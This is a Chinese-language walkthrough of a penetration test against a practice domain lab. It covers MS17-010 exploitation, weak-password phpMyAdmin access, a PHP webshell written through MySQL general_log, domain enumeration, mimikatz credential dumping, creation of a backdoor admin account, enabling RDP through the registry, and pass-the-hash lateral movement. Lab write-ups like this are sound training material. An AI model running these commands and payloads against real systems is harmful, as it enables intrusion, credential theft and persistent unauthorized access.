一、靶场拓扑图
二、关闭防火墙
三台靶场机器都搭建好之后,在我的win10上访问win7,发现打不开网页,但是在win7的浏览器访问自己的80端口又是能够访问到探针网页的。然后发现win7的防火墙没关,关了就能在win10上成功访问win7的探针页面了。
三、渗透
使用fscan收集win7的信息,发现MS17-010
利用MSF的模块成功拿下
通过查看win7的网卡,发现有内网环境
再使用目录扫描看看,发现phpmyadmin
弱口令root/root就进来了
这下为NULL就不能写dll了
回顾一下MySQL的利用方式
1 2 UDF提权GetShell 利用general_log拿Shell (如果导入导出被禁了就可以试试这个方法)
现在只有利用日志文件写Shell了,先看看日志文件路径
1 2 3 show global variables like '%general%'; 路径为:C:\phpStudy\MySQL\data\stu1.log
1 2 3 set global general_log=on; set global general_log_file='C:/phpStudy/www/10086.php'; select '<?php eval($_POST[10086]) ?>';
为什么这里的地址是www路径,使用过phpstudy的都知道,MySQL安装目录是和WWW目录是在同一个目录下的
连接成功
内网信息收集
先上线CS
通过查看systeminfo命令发现存在域,域名为god.org ,且只打了4个补丁
1 2 #查看杀软进程 tasklist / wmic process list brief
也没有杀软
看一下都装了什么软件
DNS服务器所在的网段为192.168.52.0/24
1 2 netsh advfirewall show all state //查看防火墙状态 netsh advfirewall set allprofile state off //关闭防火墙
防火墙是关闭的
查看计算机的域名
1 net group "domain computers" /domain
通过ipconfig /all可知道当前win7的名字为STU1,另外两个是DEV1和ROOT-TVI862UBEH
查看域管理员用户
1 net group "domain admins" /domain
1 2 3 4 5 6 7 8 9 10 11 12 net view # 查看局域网内其他主机名 net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user # 查看本机用户列表 net user /domain # 查看域用户 net localgroup administrators # 查看本地管理员组(通常会有域用户) net view /domain # 查看有几个域 net user 用户名 /domain # 获取指定域用户的信息 net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作) net group 组名 /domain # 查看域中某工作组 net group "domain admins" /domain # 查看域管理员的名字 net group "domain computers" /domain # 查看域中的其他主机名 net group "doamin controllers" /domain # 查看域控制器主机名(可能有多台)
域管理员为OWA
CS设置代理,fscan探测存活
找到2台存活主机192.168.52.138、192.168.52.141
给win7的session加上一个到达192.168.52.138的路由,并探测一下17-010
不过没有利用成功
使用stowaway上个代理,挂上代理扫描一波192.168.52.0/24网段
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #mimikatz的一些命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关模块 service: 服务相关模块 lsadump: LsaDump模块 ts: 终端服务器模块 event: 事件模块 misc: 杂项模块 token: 令牌模块 vault: 令牌操作模块 minesweepre:Mine Sweeper模块 dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口] busyloght: BusyLight Module sysenv: 系统环境值模块 sid: 安全标识符模块 iis: IIS XML配置模块 rpc: mimikatz的RPC控制 sr98: RDM(830AL)器件的射频模块 acr: ACR模块 version: 查看版本 exit: 推出 creds_msv: 获取密码hash值 creds_kerberos: 获取密码明文
抓到明文密码hongrisec@2022
上线CS并提权
设置监听器,利用蚁剑把马儿上传上去
本想扫描一下端口
1 2 3 4 use auxiliary/scanner/portscan/tcp set rhosts 192.168.52.141 set threads 100 run
前面已经发现安装了nmap,就使用nmap来信息收集,懵逼的是在MSF拿的Shell里执行nmap命令提示找不到nmap,CS里也是一样显示找不到,在蚁剑的伪终端里就能使用nmap,发现135/139/445端口也开着的
MSF使用ms17-010扫描模块发现都存在永恒之蓝漏洞
但是192.168.52.141是32位的,就不能使用永恒之蓝去打,但是可以使用命令执行,所以这里可以添加个账号,用3389登录上去,挨个利用命令执行模块执行以下命令
1 2 3 set command net user axin axin123 /add set command net localgroup administrators axin /add set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
再使用3389连接,成功
收集信息到CS
然后使用hash传递,psexec到其他主机